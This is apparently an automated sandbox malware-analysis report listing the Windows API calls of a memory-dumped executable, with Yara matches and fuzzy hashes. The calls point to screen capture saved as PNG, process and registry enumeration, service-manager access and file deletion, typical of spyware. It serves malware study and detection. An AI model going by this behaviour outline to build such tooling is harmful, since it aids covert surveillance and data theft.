                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,00000000), ref: 00411012
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000), ref: 00411022
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 0041102F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411050
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 0041105C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411039
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041108C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411096
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 00410FB4
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                    • Part of subcall function 00411927: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                    • Part of subcall function 00411927: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                    • Part of subcall function 00411927: OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                    • Part of subcall function 00411927: CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                    • Part of subcall function 00411927: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,?), ref: 004110F4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,?), ref: 00411104
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00411111
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 0041111B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00411132
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 0041113E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041118E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411198
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041121F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411229
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 004112A9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 004112B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 00411336
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411340
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,0041B310,00000000), ref: 0041135A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00411371
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 004113AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00000000), ref: 004113BE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@??3@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                  • String ID:
                                  • API String ID: 3693186435-0
                                  • Opcode ID: cd72056f7e751515985b6b9eebd6418a69e90cee30d8c19192eb2fd2a7cf57ff
                                  • Instruction ID: 8efa13a56e58a3380b66c3db6183ea909b867b6e0f3936dc641b94412a702233
                                  • Opcode Fuzzy Hash: cd72056f7e751515985b6b9eebd6418a69e90cee30d8c19192eb2fd2a7cf57ff
                                  • Instruction Fuzzy Hash: E6C1B4B1D101086BDB04B7A2ED56DFF777CEB50304F00481EFA16A71D2EE395A89C66A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                    • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                    • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                  • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                  • String ID: dat$image/png$png
                                  • API String ID: 3276867942-186023265
                                  • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                  • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                    • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
                                    • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                  • String ID:
                                  • API String ID: 819894693-0
                                  • Opcode ID: 1d7193b6688f9040ddf4de3a5326fa2c3a8462b65cc9de86db02c14405c27943
                                  • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                  • Opcode Fuzzy Hash: 1d7193b6688f9040ddf4de3a5326fa2c3a8462b65cc9de86db02c14405c27943
                                  • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65

                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                  • RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  • RegEnumValueW.ADVAPI32 ref: 0040BC67
                                  • _itoa.MSVCRT ref: 0040BC7E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?,?,0040BE7D,0040C731), ref: 0040BC96
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000,?,0040BE7D,0040C731), ref: 0040BCA8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCB6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCBF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCCB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415770,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCE0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCEF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD12
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD27
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD42
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD50
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
